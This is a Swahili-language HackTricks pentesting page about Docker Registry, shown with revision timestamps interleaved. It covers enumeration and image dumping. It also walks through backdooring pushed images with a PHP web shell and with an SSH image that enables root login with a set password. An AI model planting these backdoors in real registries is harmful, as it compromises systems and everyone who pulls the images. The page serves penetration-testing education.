hacktricks/network-services-pentesting/5000-pentesting-docker-registry.md

329 lines
15 KiB
Markdown
Raw Normal View History

2024-04-06 19:39:38 +00:00
# 5000 - Pentesting Docker Registry
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2022-04-28 16:01:33 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
2024-04-06 19:39:38 +00:00
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 02:13:58 +00:00
## Taarifa Msingi
Mfumo wa uhifadhi na usambazaji unaojulikana kama **Docker registry** umewekwa kwa ajili ya picha za Docker ambazo zina majina na zinaweza kuja katika toleo mbalimbali, zilizotofautishwa na vitambulisho. Picha hizi zimepangwa ndani ya **maktaba za Docker** kwenye usajili, kila maktaba ikihifadhi toleo mbalimbali la picha fulani. Utendaji unaotolewa unaruhusu picha kupakuliwa kwa kifaa au kupakiwa kwenye usajili, ikizingatiwa kuwa mtumiaji ana ruhusa inayohitajika.
**DockerHub** hutumika kama usajili wa umma wa msingi kwa Docker, lakini watumiaji pia wana chaguo la kuendesha toleo la ndani la usajili/distribusheni ya Docker ya chanzo wazi au kuchagua **Docker Trusted Registry** inayoungwa mkono kibiashara. Aidha, usajili mbalimbali wa umma unaweza kupatikana mtandaoni.
Kupakua picha kutoka kwenye usajili wa ndani, amri ifuatayo hutumiwa:
2024-04-06 19:39:38 +00:00
2024-02-08 21:36:50 +00:00
```bash
docker pull my-registry:9000/foo/bar:2.1
```
2024-04-06 19:39:38 +00:00
Hii amri inapata picha ya `foo/bar` toleo `2.1` kutoka kwenye usajili wa ndani kwenye kikoa cha `my-registry` kwenye bandari ya `9000`. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa `2.1` ni toleo jipya, amri inakuwa:
2024-04-06 19:39:38 +00:00
2024-02-08 21:36:50 +00:00
```bash
docker pull foo/bar
```
2024-04-06 19:39:38 +00:00
**Bandari ya chaguo-msingi:** 5000
2024-04-06 19:39:38 +00:00
```
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
2024-04-06 19:39:38 +00:00
2024-02-11 02:13:58 +00:00
## Kugundua
Njia rahisi ya kugundua huduma hii inayotumika ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kama ni huduma inayotegemea HTTP inaweza kuwa nyuma ya wakala wa HTTP na nmap haitaigundua.\
Baadhi ya alama za vidole:
* Ukifika `/` hakuna kitu kinachorudi kwenye jibu
* Ukifika `/v2/` basi `{}` inarudi
* Ukifika `/v2/_catalog` unaweza kupata:
2024-02-11 02:13:58 +00:00
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
## Uchambuzi
2022-05-01 13:25:53 +00:00
### HTTP/HTTPS
Usajili wa Docker unaweza kuwa umewekwa kutumia **HTTP** au **HTTPS**. Kwa hivyo, jambo la kwanza unaloweza kulazimika kufanya ni **kugundua ni ipi** inayowekwa:
2024-04-06 19:39:38 +00:00
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
2024-02-11 02:13:58 +00:00
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
#If HTTP
{"repositories":["alpine","ubuntu"]}
```
2024-04-06 19:39:38 +00:00
### Uthibitisho
Docker registry inaweza pia kusanidiwa kuhitaji **uthibitisho**:
2024-04-06 19:39:38 +00:00
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
2024-04-06 19:39:38 +00:00
Ikiwa Usajili wa Docker unahitaji uthibitisho unaweza [**jaribu kuvunja nguvu kutumia hii**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**Ikiwa unapata sifa halali utahitaji kuzitumia** kuchambua usajili, katika `curl` unaweza kuzitumia kama hivi:
2024-04-06 19:39:38 +00:00
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
2024-04-06 19:39:38 +00:00
### Uchambuzi kwa kutumia DockerRegistryGrabber
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) ni chombo cha python cha kuchambua / kudump docker registry (bila au na uthibitishaji wa msingi)
2024-04-06 19:39:38 +00:00
```bash
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url
____ ____ ____
| _ \ | _ \ / ___|
| | | || |_) || | _
| |_| || _ < | |_| |
|____/ |_| \_\ \____|
Docker Registry grabber tool v2
by @SyzikSecu
positional arguments:
url URL
options:
-h, --help show this help message and exit
-p port port to use (default : 5000)
Authentication:
-U USERNAME Username
-P PASSWORD Password
-A header Authorization bearer token
Actions:
--list
--dump_all
--dump DOCKERNAME DockerName
Example commands:
python drg.py http://127.0.0.1 --list
python drg.py http://127.0.0.1 --dump my-ubuntu
python drg.py http://127.0.0.1 --dump_all
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --list
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump my-ubuntu
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump_all
python drg.py https://127.0.0.1 -A '<Auth BEARER TOKEN>' --list
python drg.py https://127.0.0.1 -A '<Auth BEARER TOKEN>' --dump my-ubuntu
python drg.py https://127.0.0.1 -A '<Auth BEARER TOKEN>' --dump_all
python3 DockerGraber.py http://127.0.0.1 --list
[+] my-ubuntu
[+] my-ubuntu2
python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu
[+] blobSum found 5
[+] Dumping my-ubuntu
2024-02-11 02:13:58 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
python3 DockerGraber.py http://127.0.0.1 --dump_all
[+] my-ubuntu
[+] my-ubuntu2
[+] blobSum found 5
[+] Dumping my-ubuntu
2024-02-11 02:13:58 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] blobSum found 5
[+] Dumping my-ubuntu2
2024-02-11 02:13:58 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
```
2024-04-06 19:39:38 +00:00
### Uchambuzi kwa kutumia curl
Mara baada ya **kupata ufikivu wa docker registry** hapa kuna baadhi ya amri unazoweza kutumia kuchambua:
2024-04-06 19:39:38 +00:00
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}
#Get tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}
#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
{
2024-02-11 02:13:58 +00:00
"schemaVersion": 1,
"name": "ubuntu",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
},
{
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX",
"kty": "EC",
"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg",
"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"
},
"alg": "ES256"
},
"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"
}
]
}
#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
#Inspect the insides of each blob
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
```
2024-04-06 19:39:38 +00:00
{% hint style="warning" %}
Tafadhali kumbuka kwamba unapopakua na kufungua faili za blobs, faili na folda zitaonekana kwenye saraka ya sasa. **Ikiwa unapakua blobs zote na kuzifungua kwenye saraka moja zitafuta thamani kutoka kwa blobs zilizofunguliwa awali**, kwa hivyo kuwa mwangalifu. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya saraka tofauti ili uchunguze maudhui halisi ya kila blob.
{% endhint %}
### Uchambuzi kwa kutumia docker
2024-04-06 19:39:38 +00:00
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE CREATED CREATED BY SIZE COMMENT
2024-02-11 02:13:58 +00:00
#ed05bef01522 2 years ago ./run.sh 46.8MB
#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B
#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B
#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B
#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB
#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
2024-04-06 19:39:38 +00:00
### Kuweka mlango nyuma kwa picha ya WordPress
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuweka mlango nyuma.\
2024-02-11 02:13:58 +00:00
**Tengeneza** mlango **nyuma**:
{% code title="shell.php" %}
```bash
<?php echo shell_exec($_GET["cmd"]); ?>
```
{% endcode %}
Tengeneza **Dockerfile**:
{% code title="Dockerfile" %}
2024-04-06 19:39:38 +00:00
```
```
{% endcode %}
```bash
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
2024-04-06 19:39:38 +00:00
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **sukuma**:
2024-04-06 19:39:38 +00:00
```bash
docker build -t 10.10.10.10:5000/wordpress .
2024-02-11 02:13:58 +00:00
#Create
docker images
docker push registry:5000/wordpress #Push it
```
2024-04-06 19:39:38 +00:00
### Kuweka mlango wa nyuma kwenye picha ya seva ya SSH
2024-02-11 02:13:58 +00:00
Fikiria umepata Docker Registry na picha ya SSH na unataka kuweka mlango wa nyuma.\
**Pakua** picha hiyo na **itekeleze**:
2024-04-06 19:39:38 +00:00
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
2024-04-06 19:39:38 +00:00
Chambua faili ya `sshd_config` kutoka kwenye picha ya SSH:
2024-04-06 19:39:38 +00:00
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
2024-04-06 19:39:38 +00:00
2024-02-11 02:13:58 +00:00
Na ubadilishe ili kuweka: `PermitRootLogin yes`
Unda **Dockerfile** kama ule ufuatao:
2024-04-06 19:39:38 +00:00
\`\`\`bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd\_config /etc/ssh/ RUN echo root:password | chpasswd \`\`\` \*\*Unda\*\* picha mpya, \*\*angalia\*\* imeundwa, na \*\*sukuma\*\*: \`\`\`bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it \`\`\` ## Marejeo \* \[https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/]\(https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
2024-02-08 21:36:50 +00:00
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2022-04-28 16:01:33 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
2024-04-06 19:39:38 +00:00
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>